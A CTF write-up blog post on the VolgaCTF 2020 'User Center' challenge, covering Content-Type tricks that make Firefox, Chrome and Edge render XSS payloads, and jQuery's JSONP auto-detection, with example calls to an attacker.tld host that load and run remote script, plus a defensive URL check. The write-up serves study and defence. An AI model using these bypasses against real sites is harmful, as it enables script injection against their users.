VolgaCTF 2020 Qualifier User Center

MIME bypass

The challenge filters html, xml and xsl, and the Content-Type must contain /.

Firefox

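  • If the Content-Type header does not contain a / character, Firefox tries to guess the file type. In addition, X-Content-Type-Options: nosniff has no effect in this case, because Firefox only applies it when a file with the wrong content type is loaded through <script src=> or <link rel="stylesheet" href=>.

  • text/rdf is handled as XML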

    Content-Type: text/rdf
    <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
    
  • multipart/x-mixed-replace supports HTML (example)
    If nosniff is missing, Edge handles this type like regular HTML.

    Content-Type: multipart/x-mixed-replace;boundary=xxx
    
    xxx
    Content-Type:text/html
    
    <script>alert(document.domain)</script>
    xxx--
    
  • */*
    In this case Firefox guesses the file type and ignores X-Content-Type-Options: nosniff.

  • text/plain;,text/html: multiple comma-separated types are supported

    Content-Type: text/plain;,text/html
    
    <script>alert(document.domain)</script>
    

Chrome

  • text/xsl is handled as XML

    Content-Type: text/xsl
    <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(document.domain)</a:script>
    
  • text/plain;,text/html: multiple comma-separated types are supported

    Content-Type: text/plain;,text/html
    
    <script>alert(document.domain)</script>
    

Edge

  • text/vtt is handled as HTML
    Content-Type: text/vtt
    <script>alert(document.domain)</script>
    

Cross-origin requests via JSONP

If the URL includes the string "callback=?" (or similar, as defined by the server-side API), the request is treated as JSONP instead. See the discussion of the jsonp data type in $.ajax() for more details.

So if we can control the URL passed to $.getJSON, we can get XSS.

Changes to the callback regular expression across jQuery versions:

>  1.7.2 /(=)\?(?=&|$)|\?\?/
<= 1.7.2 /(\=)\?(&|$)|\?\?/i
<= 1.5.1 /(\=)\?(&|$)|()\?\?()/i
<= 1.4.4 /\=\?(&|$)/
<= 1.4.2 /=\?(&|$)/
<= 1.2.1 /=(\?|%3F)/g
<  1.2   not supported

Code examples

$.ajax({url:'https://attacker.tld/??', dataType:'json'});
$.ajax({url:'https://attacker.tld/=?&', dataType:'json'});
$.getJSON('https://attacker.tld??');
$.getJSON('https://??.attacker.tld');

$.getJSON('https://xxx.com?callback??'); is finally resolved to https://xxx.com/?callbackjQueryxxx&_=[timestamp], and the data it fetches is then executed as JS.
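
As an added example (not code from the original post or from jQuery), the regex table above can be turned into a check that reports whether a given jQuery version would treat a URL as JSONP, plus a guard to run before a user-influenced URL reaches $.getJSON. The function names, the example.test URLs and the reading of each "<=" row as covering versions above the previous row's bound are assumptions.

```javascript
// Callback-placeholder patterns copied from the version table on this page.
// Assumption: each "<=" row covers versions above the previous row's bound.
const JSONP_PATTERNS = [
  { upTo: [1, 2, 1], re: /=(\?|%3F)/g },
  { upTo: [1, 4, 2], re: /=\?(&|$)/ },
  { upTo: [1, 4, 4], re: /\=\?(&|$)/ },
  { upTo: [1, 5, 1], re: /(\=)\?(&|$)|()\?\?()/i },
  { upTo: [1, 7, 2], re: /(\=)\?(&|$)|\?\?/i },
  { upTo: [Infinity, 0, 0], re: /(=)\?(?=&|$)|\?\?/ },
];

function parseVersion(v) {
  const parts = v.split('.').map(Number);
  while (parts.length < 3) parts.push(0);
  return parts;
}

function cmp(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// True when the given jQuery version would treat this URL as JSONP.
function promotesToJsonp(url, version) {
  const v = parseVersion(version);
  if (cmp(v, [1, 2, 0]) < 0) return false; // "< 1.2 not supported"
  const row = JSONP_PATTERNS.find((p) => cmp(v, p.upTo) <= 0);
  // String#search ignores the g flag and lastIndex, so the check is stateless.
  return url.search(row.re) !== -1;
}

// Version-independent guard (hypothetical helper): accept a URL only if none
// of the listed patterns match it, so it is always fetched as plain JSON.
function isPlainJsonUrl(url) {
  return !JSONP_PATTERNS.some((p) => url.search(p.re) !== -1);
}

// Constructed sample input: the same URL under two jQuery versions.
for (const ver of ['1.4.4', '3.4.1']) {
  console.log(ver, promotesToJsonp('https://example.test/api??', ver));
}
```

Running isPlainJsonUrl on the final URL string, after all concatenation, matters because the placeholder can sit in the host or path as well as the query.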

posted @ 2020-03-31 17:49  MustaphaMond